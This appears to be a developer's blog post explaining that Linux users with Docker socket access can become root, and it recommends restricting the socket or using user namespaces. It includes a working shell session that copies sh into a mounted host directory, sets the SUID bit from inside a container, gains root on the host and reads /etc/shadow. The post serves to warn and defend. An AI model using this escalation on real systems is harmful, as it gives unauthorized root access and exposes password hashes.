So, what’s the fuss about having access to Docker socket? Well, by default, it is pretty insecure. How insecure? Very. This isn’t something new, others wrote about this before, but I’m surprised people are still getting tripped by this as it isn’t properly advertised.
This isn’t an issue with Docker for Mac / Docker for Windows simply because the actual Docker installation runs in a virtual machine. So, at best, you can compromise the VM rather than the developer machine. This is an issue for people who develop under Linux or run Dockers on servers.
The root of the problem (pun intended) is that the root user inside the container is also the root user on the host machine. Docker is supposed to isolate the process, but, the isolation may fail (which, it has, in the past), or the kernel, which is shared, may have a vulnerability (which has happened in the past).
While the shared kernel by itself is unavoidable (after all, this is all the rage about containers), the root user within the container being the root user on the host can be workaround by user namespaces. This has some drawbacks and missing functionality, so Docker being Docker took convenience over security as defaults, violating an important security principle (secure defaults).
The escalation from user to root if that user has access to the Docker socket is pretty much time immemorial in *nix land and it involves setting the SUID bit.
In practical terms:
- Start a container with a volume mount from a path controlled by the unprivileged user.
- Set SUID for a binary inside the container, a binary which is owned by root. Consequently, that’s the same UID 0 as the root user on the host which is the crux of the matter. That binary needs to be placed into the volume mount path. Some binaries (such as sh or bash on newer distributions) are hardened and they don’t elevate EUID and EGID to 0 despite SUID being set.
- Run the binary on the host with the SUID set and the file owned by root.
- Profit. Welcome to EUID 0.
vagrant$ docker run -v $(pwd):/target -it ubuntu:14.04 /bin/bash root@31e0908a67db:/# cp /bin/sh /target/ root@31e0908a67db:/# chmod +s /target/sh root@31e0908a67db:/# exit vagrant$ ./sh # id uid=1000(vagrant) gid=1000(vagrant) euid=0(root) egid=0(root) groups=0(root),1000(vagrant) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 cat /etc/shadow [...] bin::18474:0:99999:7::: daemon::18474:0:99999:7::: adm:*:18474:0:99999:7::: [...]
The example uses an older image as sh is not hardened, but you get the gist. Any binary could do damage e.g a SUID cat or tee can arbitrarily write files with root privileges. With root access inside the container, installing packages from a repository is also possible e.g zsh is not hardened even on newer distributions.
For Linux developers, there’s no Docker for Linux. docker-machine still works to create machines in VirtualBox (or other hypervisors, including remotely on cloud). However, that has an expiration date as boot2docker (which is the backend image for the VirtualBox driver) has been deprecated and it recommends, wait for it, Docker for Desktop (Windows or Mac), or the Linux runtime. Precisely that runtime which is has vulnerable defaults. Triple facepalm.
The reasons for discontinuing boot2docker is the existing alternatives, but those alternatives don’t exist for Linux distributions or they are simply deprecated as well. With others being mainly the same idea of a VM (I even maintained one at some point) or docker-machine still depending on boot2docker, I don’t see any easy fix.
- Dust off my old Docker VM (which I have). I wrote that with performance in mind, but for development purposes. It works cross-platform.
- Try to build a newer boot2docker release. This may be more complicated as it involves upgrading both Tiny Core Linux and Docker itself, plus a host of VM drivers/additions/tools. For the time being, this seems like too much of a time commitment.
docker-machine supports an alternative release URL for boot2docker (if I’m reading the source code correctly i.e apiURL), so it should work with some effort, but without changing the code in docker-machine. Maintaining boot2docker on the other hand is the bit that looks time consuming which is far more than the 5 minutes to build my Docker VM from scratch.
As I’ve mentioned servers, the main takeaway is simple: don’t give access to the Docker socket for users other than root unless user namespaces are employed, provided this isn’t prevented by a legitimate use case which makes user namespaces noop. Should that be the case, then the Docket socket needs to be restricted to root only, otherwise, the risk of accidental machine compromise is too great as it increases the attack surface by a significant margin.